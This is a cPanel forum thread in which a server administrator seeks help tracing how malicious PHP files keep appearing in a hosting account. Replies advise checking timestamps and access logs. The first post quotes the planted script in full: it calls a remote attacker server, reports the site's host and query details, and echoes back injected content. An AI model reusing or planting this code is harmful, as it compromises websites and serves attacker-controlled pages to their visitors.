Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Find out how files were uploaded

Discussion in 'Security' started by ::Gomez::, Sep 13, 2016.

  1. ::Gomez::

    ::Gomez:: Member

    Joined:
    Oct 13, 2003
    Messages:
    17
    Likes Received:
    1
    Trophy Points:
    151
    Location:
    Argentina
    cPanel Access Level:
    Root Administrator
    Twitter:
    Hi, I am dealing with a security issue inside an account. Everyday new files are uploaded to public_html and subfolders, with strange content inside..

    for example...

    /home/xxx/public_html/rtrfei.php
    /home/xxx/public_html/fdbs.php

    content is pretty much the same on any of the files...

    PHP:
    <?php
    set_time_limit
    (0);

    header("Content-Type: text/html;charset=gb2312");
    date_default_timezone_set('PRC');
    $Remote_server "http://www.example.date/";
    $host_name "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
    $Content_mb=file_get_contents($Remote_server."/AK47/2.html?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

    echo 
    $Content_mb;

    ?>

    I would like to know if there is any way of finding out how this files were uploaded... (FTP, SCP, SSH, via an script on the server.. etc...)


    I think this is the first step to be able to identify the root cause of this issue..

    I do have root access to the server.


    thanks!
     
    #1 ::Gomez::, Sep 13, 2016
    Last edited by a moderator: Sep 13, 2016
  2. sparek-3

    sparek-3 Well-Known Member

    Joined:
    Aug 10, 2002
    Messages:
    1,649
    Likes Received:
    73
    Trophy Points:
    328
    cPanel Access Level:
    Root Administrator
    You need to get a timestamp of when the files were placed on the server, then look for activity (cPanel access, FTP, web) around that same time. That will help lead you in the direction of how the files came to be on the server.
     
  3. NOC_Serverpoint

    NOC_Serverpoint Well-Known Member

    Joined:
    Jul 3, 2016
    Messages:
    102
    Likes Received:
    6
    Trophy Points:
    18
    cPanel Access Level:
    Website Owner
    You would just have to check network and file access logs in the server
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  4. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    43,633
    Likes Received:
    1,787
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice